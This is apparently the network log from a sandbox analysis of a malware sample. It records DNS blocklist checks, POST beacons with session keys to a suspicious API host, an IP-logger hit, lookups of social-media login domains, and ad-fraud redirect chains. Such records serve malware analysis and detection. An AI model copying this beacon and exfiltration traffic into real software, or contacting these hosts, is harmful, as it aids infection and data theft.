                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          Request
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          Request
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          Request
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          Request
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          IN A
                                                                                          Response
                                                                                        • GET
                                                                                          http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                          Request
                                                                                          GET /api/fbtime HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:25:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • POST
                                                                                          http://uyg5wye.2ihsfa.com/api/?sid=74023&key=a61861ce653c44bb08dae241634bbf70
                                                                                          Request
                                                                                          POST /api/?sid=74023&key=a61861ce653c44bb08dae241634bbf70 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Content-Length: 266
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:25:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • GET
                                                                                          https://iplogger.org/18hh57
                                                                                          Request
                                                                                          GET /18hh57 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Host: iplogger.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:25:12 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=ajehete1s3hbhft5hielu7hh05; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253175079; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          i.instagram.com
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          i.instagram.com
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          accounts.snapchat.com
                                                                                          Request
                                                                                          accounts.snapchat.com
                                                                                          IN A
                                                                                          Response
                                                                                          accounts.snapchat.com
                                                                                          IN CNAME
                                                                                          ghs.googlehosted.com
                                                                                          ghs.googlehosted.com
                                                                                          IN A
                                                                                          172.217.17.51
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          i.instagram.com
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          vexacion.com
                                                                                          Request
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          Response
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          139.45.197.236
                                                                                        • GET
                                                                                          http://vexacion.com/afu.php?id=1294231
                                                                                          Request
                                                                                          GET /afu.php?id=1294231 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378; syncedCookie=true
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:28:57 GMT
                                                                                          Content-Type: text/html; charset=utf8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 7382e8763497abad354241e796cb60d4
                                                                                          Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:28:59 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:28:59 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                          Content-Encoding: gzip
                                                                                        • POST
                                                                                          http://vexacion.com/?z=1294231&syncedCookie=false
                                                                                          Request
                                                                                          POST /?z=1294231&syncedCookie=false HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1294231&var=1294231&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Content-Length: 536
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378; syncedCookie=true
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:28:57 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 9055f2bb22f8d8e6b6b23bf81a0dd7b9
                                                                                          Link: <https://myactualblog.com>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                          Referrer-Policy: no-referrer
                                                                                          Location: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:29:00 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:29:00 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                        • DNS
                                                                                          my.rtmark.net
                                                                                          Request
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          Response
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          139.45.195.8
                                                                                        • POST
                                                                                          https://my.rtmark.net/img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4
                                                                                          Request
                                                                                          POST /img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4 HTTP/2.0
                                                                                          host: my.rtmark.net
                                                                                          origin: http://vexacion.com
                                                                                          referer: http://vexacion.com/afu.php?id=1294231
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          content-type: text/plain;charset=UTF-8
                                                                                          accept-language: en-US
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          content-length: 0
                                                                                          cache-control: no-cache
                                                                                          cookie: ID=3819b934f4054333861a9d6dc9a564e4
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:28:57 GMT
                                                                                          content-type: image/gif
                                                                                          content-length: 43
                                                                                          access-control-allow-origin: http://vexacion.com
                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
                                                                                          access-control-expose-headers: Authorization
                                                                                          access-control-allow-credentials: true
                                                                                          timing-allow-origin: *
                                                                                          set-cookie: ID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:29:00 GMT; secure; SameSite=None
                                                                                          strict-transport-security: max-age=1
                                                                                          x-content-type-options: nosniff
                                                                                          timing-allow-origin: *
                                                                                        • POST
                                                                                          https://my.rtmark.net/img.gif?f=merge&userId=1d8bfbc63e5c4ffb8c9d64deb7ba5fb9
                                                                                          Request
                                                                                          POST /img.gif?f=merge&userId=1d8bfbc63e5c4ffb8c9d64deb7ba5fb9 HTTP/2.0
                                                                                          host: my.rtmark.net
                                                                                          origin: https://jeehathu.com
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          content-type: text/plain;charset=UTF-8
                                                                                          accept-language: en-US
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          content-length: 0
                                                                                          cache-control: no-cache
                                                                                          cookie: ID=3819b934f4054333861a9d6dc9a564e4
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          content-type: image/gif
                                                                                          content-length: 43
                                                                                          access-control-allow-origin: https://jeehathu.com
                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
                                                                                          access-control-expose-headers: Authorization
                                                                                          access-control-allow-credentials: true
                                                                                          timing-allow-origin: *
                                                                                          set-cookie: ID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:29:03 GMT; secure; SameSite=None
                                                                                          strict-transport-security: max-age=1
                                                                                          x-content-type-options: nosniff
                                                                                          timing-allow-origin: *
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 1211
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • DNS
                                                                                          myactualblog.com
                                                                                          Request
                                                                                          myactualblog.com
                                                                                          IN A
                                                                                          Response
                                                                                          myactualblog.com
                                                                                          IN A
                                                                                          139.45.197.170
                                                                                        • GET
                                                                                          https://myactualblog.com/templates/_assets/push-skin/skin.css
                                                                                          Request
                                                                                          GET /templates/_assets/push-skin/skin.css HTTP/1.1
                                                                                          Accept: text/css, */*
                                                                                          Referer: https://myactualblog.com/templates/_assets/push-skin/skin.html
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Content-Type: text/css
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:12:16 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          ETag: W/"60e86750-5cf1"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, HEAD
                                                                                          Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Access-Control-Expose-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Content-Encoding: gzip
                                                                                        • GET
                                                                                          https://myactualblog.com/templates/_assets/push-skin/skin.min.js
                                                                                          Request
                                                                                          GET /templates/_assets/push-skin/skin.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://myactualblog.com/templates/_assets/push-skin/skin.html
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:12:16 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          ETag: W/"60e86750-6d48"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, HEAD
                                                                                          Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Access-Control-Expose-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Content-Encoding: gzip
                                                                                        • GET
                                                                                          https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          Request
                                                                                          GET /?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1294231&var=1294231&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.4.18
                                                                                          Set-Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4; expires=Sat, 10-Jul-2021 00:29:00 GMT; Max-Age=3600; path=/
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, HEAD
                                                                                          Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Access-Control-Expose-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          Content-Encoding: gzip
                                                                                        • GET
                                                                                          https://myactualblog.com/templates/_assets/push-skin/skin.html
                                                                                          Request
                                                                                          GET /templates/_assets/push-skin/skin.html HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          Content-Type: text/html
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:12:16 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          ETag: W/"60e86750-a84"
                                                                                          Strict-Transport-Security: max-age=60
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Encoding: gzip
                                                                                        • POST
                                                                                          https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio&mprtr=1
                                                                                          Request
                                                                                          POST /?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio&mprtr=1 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Origin: https://myactualblog.com
                                                                                          Referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: myactualblog.com
                                                                                          Content-Length: 0
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: reverse=JP4IM21Bn2n8JA638yOEb-isNNhSQ2M0u_V41ahXxz4
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.4.18
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
                                                                                          Content-Encoding: gzip
                                                                                        • DNS
                                                                                          littlecdn.com
                                                                                          Request
                                                                                          littlecdn.com
                                                                                          IN A
                                                                                          Response
                                                                                          littlecdn.com
                                                                                          IN A
                                                                                          104.22.25.116
                                                                                          littlecdn.com
                                                                                          IN A
                                                                                          172.67.10.98
                                                                                          littlecdn.com
                                                                                          IN A
                                                                                          104.22.24.116
                                                                                        • DNS
                                                                                          propeller-tracking.com
                                                                                          Request
                                                                                          propeller-tracking.com
                                                                                          IN A
                                                                                          Response
                                                                                          propeller-tracking.com
                                                                                          IN A
                                                                                          139.45.197.240
                                                                                        • GET
                                                                                          https://littlecdn.com/apps/templates/_assets/scripts/inapp.min.js
                                                                                          Request
                                                                                          GET /apps/templates/_assets/scripts/inapp.min.js HTTP/2.0
                                                                                          host: littlecdn.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:29:00 GMT
                                                                                          content-type: application/javascript
                                                                                          last-modified: Fri, 09 Jul 2021 15:12:16 GMT
                                                                                          vary: Accept-Encoding
                                                                                          etag: W/"60e86750-54ed"
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET, POST, OPTIONS, HEAD
                                                                                          access-control-allow-headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          access-control-expose-headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 4726
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c554fc5c861e91-AMS
                                                                                          content-encoding: br
                                                                                        • DNS
                                                                                          mc.yandex.ru
                                                                                          Request
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          Response
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          87.250.250.119
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          93.158.134.119
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          77.88.21.119
                                                                                          mc.yandex.ru
                                                                                          IN A
                                                                                          87.250.251.119
                                                                                        • GET
                                                                                          https://mc.yandex.ru/metrika/tag.js
                                                                                          Request
                                                                                          GET /metrika/tag.js HTTP/2.0
                                                                                          host: mc.yandex.ru
